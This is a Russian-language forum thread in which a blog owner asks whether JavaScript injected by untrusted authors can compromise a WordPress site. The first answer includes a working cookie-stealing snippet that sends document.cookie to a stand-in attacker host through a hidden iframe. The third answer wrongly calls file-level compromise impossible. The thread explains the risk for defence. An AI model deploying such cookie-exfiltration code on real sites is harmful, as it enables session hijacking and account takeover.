Могут ли взломать сайт с помощью внедрения JS кода?

#взлом #javascript

Да-да, многие говорят что фантазия безгранична, и что взломать вроде можно, но я
пока не вижу способов, да я и в JS не большой спец. Хотелось бы увидеть конкретный
пример взлома сайта (получения доступа к ftp, к файлам, возможность удалять/создавать
файлы, менять права и тп.)

Для внутренних органов: интересуюсь чисто в целях самозащиты =) Хочу давать право
на написание статей на блоге незнакомым авторам, вот и интересно - WP пропускает JS
прекрасно, делать с этим что-то, или оставить так.
    

Ответы

Ответ 1

Банальный пример:
var i = document.createElement('iframe');
i.style='width: 1px; height: 1px; visibility: hidden;';
document.getElementsByTagName('body')[0].appendChild(i);
i.src='http://vasya-pupkin-xakep.org/stealcookie.php?c='+document.cookie;

Таким образом хакер Вася Пупкин часто тырит админские куки и очень быстро заходит
с ними на сайт. Если у админа есть возможность редактировать файлы из админки - это
полный контроль (есть такие штуки как phpftp и phpmyadmin)
Также этот код можно за- и перешифровать три раза, чтобы это был нечитаемый набор
символов. Вместо куков можно просто таким образом накручивать посещения другому сайту etc.


Ответ 2

Вообще через js можно проводить xss атаки, а если у вас на сайте ajax и серверная
часть самописная, никто не исключает, что таким образом можно будет как-то напакостить
в системе; например: у вас в обработчике ajax есть метод DeleteFileOnServer, если при
выполнении метода никак не проверяются права, то можно представить ситуации, в которых
злоумышленник сформирует ajax запрос, используя метод DeleteFileInServer, и удалит
какой-либо файл, не имея на это право, однако в большинстве случаев, подобные вещи
тестируются разработчиками веб-приложения, воодится проверка прав и тд. 
По теме: методика атак XSS, общие словеса на тему ajax-security.


Ответ 3

Это невозможно. Максимум, что может быть, - это кража кук. И то напрямую их отправить
не удастся (AJAX на другой домен запрещен и не работает, лично проверял). 
Придется отправлять в запросе картинки, например img.png?jesnfjkndsfjkndskjweklfngjksdngjksnjdsg
- в конце закодирован кук. Такую технологию, например, использует веб-аналитика Yandex
WebVisor (лично смотрел). 
Есть еще нюансы. JS может создать текст внутри страницы, который потом будет проиндексирован
Гуглом. Это правда - лично убедился на примере партнерки фотостраны, когда ключевые
слова питомец, подарок оказались самыми частотными согласно webmasters.google.com (сайт
про апокалипсис).
Еще недобросовестные авторы смогут переадресовать страницу, делать ссылки, картинки,
баннеры.
Но к ftp, к файлам доступ получить невозможно будет.